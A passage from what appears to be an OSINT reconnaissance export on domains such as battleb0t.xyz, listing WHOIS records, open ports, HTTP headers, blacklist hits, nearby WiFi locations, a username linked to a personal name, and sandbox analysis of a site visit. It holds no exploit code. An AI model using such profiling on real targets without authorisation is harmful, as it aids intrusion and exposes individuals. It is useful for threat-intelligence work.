[targetUID: 00000000-00003280]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\3280_676834451\\shoppingfre.js]- [targetUID: 00000000-00003280]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\3280_676834451\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00003280]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\3280_676834451\\edge_checkout_page_validator.js]- [targetUID: 00000000-00003280]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\3280_676834451\\auto_open_controller.js]- [targetUID: 00000000-00003280]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\3280_676834451\\edge_tracking_page_validator.js]- [targetUID: 00000000-00003280]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00003280]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-43', u'name': u'Writes a PE file header to disc', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 6, u'description': u'"msedge.exe" wrote 8192 bytes starting with PE header signature to file "%TEMP%\\3280_724529871\\_platform_specific\\win_x64\\widevinecdm.dll": 4d5a78000100000004000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000000000000780000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e2400005045000064ff0a00 ...'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.41"\n Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE"'}], u'threat_level': 0, u'size': None, u'job_id': u'63e18140d18c55450952de88', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': N | 185.199.110.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ThermiCam2Production TRC (Net ID: 00:05:FE:C6:35:F1) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5e6685bb0686ab-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.96.1 |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | Austria | Domain Name: INFLANY.COM
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: http://www.world4you.com
Updated Date: 2023-04-13T07:19:32Z
Creation Date: 2022-04-12T14:21:11Z
Registry Expiry Date: 2024-04-12T14:21:11Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.WORLD4YOU.AT
Name Server: NS2.WORLD4YOU.AT
DNSSEC: signedDelegation
DNSSEC DS Data: 36937 13 2 B736B70844AD09A9498F06982C97724A0BF4ACA8DE5244B40607B538A5323618
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:42:43Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: inflany.com
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: https://www.world4you.com
Updated Date: 2023-04-13T21:36:05Z
Creation Date: 2022-04-12T14:21:11Z
Registrar Registration Expiration Date: 2024-04-12T14:21:12Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email: abuse@world4you.com
Registrar Abuse Contact Phone: +43.73293035
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization:
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AT
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AT
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: https://whoispro.domain-robot.org/whois/inflany.com
Name Server: ns1.world4you.at
Name Server: ns2.world4you.at
DNSSEC: signedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:42:54Z <<<
For more information on Whois status codes, please visit https://www.icann.org/epp
# World4You Internet Services GmbH WHOIS service.
#
# The data in the World4You WHOIS database is provided to you by
# World4You Internet Services GmbH for informational purposes only and
# may be used to assist persons in obtaining information about or
# related to a domain name registration record.
# Except for agreed Internet operational purposes (such as register or
# modify existing registrations), no part of this information may be
# stored, reproduced or transmitted by any means.
# World4You does not guarantee its accuracy.
#
# By submitting a WHOIS query, you agree that you will use this data
# only for lawful purposes and that, under no circumstances, you will
# use this data to
# (1) allow, enable, or otherwise support the transmission of mass
# unsolicited, commercial advertising or solicitations via E-mail
# (spam); or
# (2) enable high volume, automated, electronic processes that apply
# to World4You (or its computer systems).
# World4You reserves the right to modify these terms at any time.
# By submitting this query, you agree to abide by this policy.
# www.world4you.com - Your hostingprovider.at
|
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 5 | 0 | None | Netlify | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-nf-request-id": "01H06Y2YH7X6V06YSWWEW2NH9C", "content-type": "text/css; charset=UTF-8", "age": "0"} |
| 2023-05-12 03:23:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.13:443 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://pics.battleb0t.xyz/images/withat_3.jpg |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:36:07 | Open UDP Port | No | Tool - nbtscan | 1 | 0 | 3 | 0 | None | 45.131.109.53:137 | 45.131.109.53 |
| 2023-05-12 02:49:41 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [185.199.111.153]
https://www.virustotal.com/en/ip-address/185.199.111.153/information/ | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-github-request-id: F620:0A4B:1087FED:17E0EF4:645DA7F4 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 02:57:21 | Internet Name | No | Certificate Transparency | 2 | 0 | 1 | 0 | None | panel.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:16:25 | Username | No | Account Finder | 6 | 0 | 1 | 0 | None | dawidsulej | Dawid Sulej |
| 2023-05-12 03:00:48 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.65): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5bed4978fe2c9b-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/carti_2.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:01:06 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.115): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | USR9108 (Net ID: 00:14:C1:10:CB:2C) | 40.2024, 29.0398 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:995 | 87.248.157.102 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_3.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | The Batcave (Net ID: 00:11:32:7C:A3:89) | 50.8897, 6.0563 |
| 2023-05-12 02:52:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://t.length/5)+1),n', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://ltec.biz/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ba8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ba8_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ba8_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_ba8_ConnHashTable<2984>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_ba8_IE_EarlyTabStart_0xea4_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2984"\n "IsoScope_ba8_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"150.60.170.23:80"\n "183.181.98.34:80"\n "183.181.98.34:443"\n "69.16.175.10:443"\n "142.251.46.234:443"\n "185.199.108.153:443"\n "142.250.189.195:443"\n "20.125.62.241:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ltec.biz"\n "www.ltec-biz.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: ltec.biz\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"c.clarity.ms"\n "code.jquery.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "ltec.biz"\n "www.ltec-biz.com"\n "yubinbango.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_1_.js")\n Found string "function $y(a,b){var c=this;return b}$y.M="internal.enableAutoEventOnScroll";var bc=ca(["data-gtm-yt-inspected-"]),az=["www.youtube.com","www.youtube-nocookie.com"],bz,cz=!1;" (Indicator: "dir "; File: "js_1_.js")\n Found string "function mz(a,b){var c=this;return b}mz.M="internal.enableAutoEventOnYouTubeActivity";var nz;function oz(a){var b=!1;return b}oz.M="internal.evaluateMatchingRules";" (Indicator: "dir "; File: "js_1_.js")\n Found string "<meta name="twitter:card" content="summary" />" (Indicator: "dir "; File: "0QMW5MWA.htm")\n Found string "<meta name="twitter:title" content=" " />" (Indicator: "dir "; File: "0QMW5MWA.htm")\n Found string "<meta name="twitter:description" content="LSI/\n" />" (Indicator: "dir "; File: "0QMW5MWA.htm")\n file/memory contains long string with (Indicator: "dir "; File: "gtm_2_.js")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar134C.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"top-mv-img-02-pc_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-services-bg-01_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-mv-img-01-pc_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-mv-img-04-pc_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-report-02-bg-01_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-services-img-06_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-services-img-05_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-feature-img-01-sp_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-feature-img-01-pc_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "0-bg-text-06_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "0-bg-text-04_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-services-img-02_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-services-img-03_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "0-bg-text-05_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-recruit-img-01-sp_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-services-img-04_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-services-img-01_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-strengths-img-01-sp_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-strengths-img-01-pc_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"\n "top-recruit-img-01-pc_1_.png" has type "RIFF (little-endian) data Web/P image" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003076]\n "Cab134B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab134B.tmp]- [targetUID: 00000000-00003076]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{57fa0f5d-ea68-11ed-870b-08002755372b}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfb7efb9e3daa9514d.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfb7efb9e3daa9514d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{57fa0f5d-ea68-11ed-870b-08002755372b}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{57fa0f5f-ea68-11ed-870b-08002755372b}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfaa00dfa09949a97d.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniqu | 185.199.108.153 |
| 2023-05-12 02:44:21 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b8:b0:60:0e:1a:2f:f1:b1:86:4b:64:ec:11:9f:
a6:79:be:e8:87:f1:88:c5:b4:49:9b:10:bb:ca:af:
